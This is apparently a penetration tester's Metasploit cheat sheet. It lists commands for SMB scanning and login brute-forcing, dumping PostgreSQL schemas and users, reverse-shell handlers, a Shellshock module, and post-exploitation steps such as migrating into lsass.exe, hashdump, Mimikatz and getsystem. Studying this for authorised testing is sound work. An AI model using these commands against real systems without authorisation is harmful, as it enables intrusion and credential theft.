# Metasploit

## Modules
* __Auxiliary__: scanners, crawlers and fuzzers
* __Encoders__: encode payloads
* __Evasion__: prepare payloads to circumvent signature-based malware detection
* __NOPs__: NOP generators for various architectures
* __Payloads__: code to run on target systems
    * Singles: self-contained inline payloads, for example generic/shell_reverse_tcp
    * Stagers: small initial payloads that download the stage
    * Stages: the payload delivered by a stager, for example windows/x64/shell/reverse_tcp
* __Post__: post-exploitation

## Notes

* Search scoped by module type
```sh
search type:auxiliary <stuff>
```
* Run an exploit without interacting with the resulting session (background it)
```sh
run -z
```
* `check` tests whether the target is vulnerable without exploiting it
* `setg` sets variables globally (across modules)
* Unset a single variable via `unset payload`
* Flush all variables via `unset all`

## Sessions

* Background a session via `background` or `ctrl+z`
* Foreground a session via `sessions -i <number>`

## Scanning

* Portscan
```sh
search portscan
```
* UDP Sweep via `scanner/discovery/udp_sweep`
* SMB Scan via `scanner/smb/smb_version` and `smb_enumshares`
* SMB login dictionary attack `scanner/smb/smb_login`
* NetBIOS via `scanner/netbios/nbname`
* HTTP version `scanner/http/http_version`

## Database

* Start the PostgreSQL service
* `msfdb init`
* `db_status` checks the database connection
* Separate projects via `workspace -a <projectname>`
* Save scan results to the database via `db_nmap`
* Show `hosts`
* Show `services`
* Set RHOSTS from the stored hosts via `hosts -R`

### Database Operations

* Dump schemas
```sh
use auxiliary/scanner/postgres/postgres_schemadump
run postgres://$DB_USER:$DB_PASS@172.10.0.42/postgres
```

* Run a SQL query
```sh
use auxiliary/admin/postgres/postgres_sql
run postgres://$DB_USER:$DB_PASS@172.10.0.42/postgres sql='select * from users'
```

## Exploits

* `show targets` lists the target platforms/versions an exploit supports
* `show payloads` lists payloads compatible with the selected module

## Reverse Shells

* Multi/handler: set the payload to match the one delivered to the target
```sh
use exploit/multi/handler
set payload <payload>
```
* Shellshock as an example
```sh
use multi/http/apache_mod_cgi_bash_env_exec
```

## Post Exploitation

* `load kiwi` loads the Mimikatz extension
* `load python` loads the Python extension
* Windows
    * Dump the SAM database (migrate into lsass.exe first)
    ```sh
    migrate <lsass.exe-PID>
    hashdump
    ```
    * Enumerate shares
    ```sh
    run post/windows/gather/enum_shares
    ```
* Linux
    * `use post/linux/gather/hashdump`

## Other Meterpreter stuff

* Check which process the session is running in (e.g. after migrating into another service's process)
```sh
getpid
ps
```
* Attempt to elevate privileges
```sh
getsystem
```
* Within `multi/handler` or an exploit module, get an overview of compatible payloads via `show payloads`
* Current user ID via `getuid`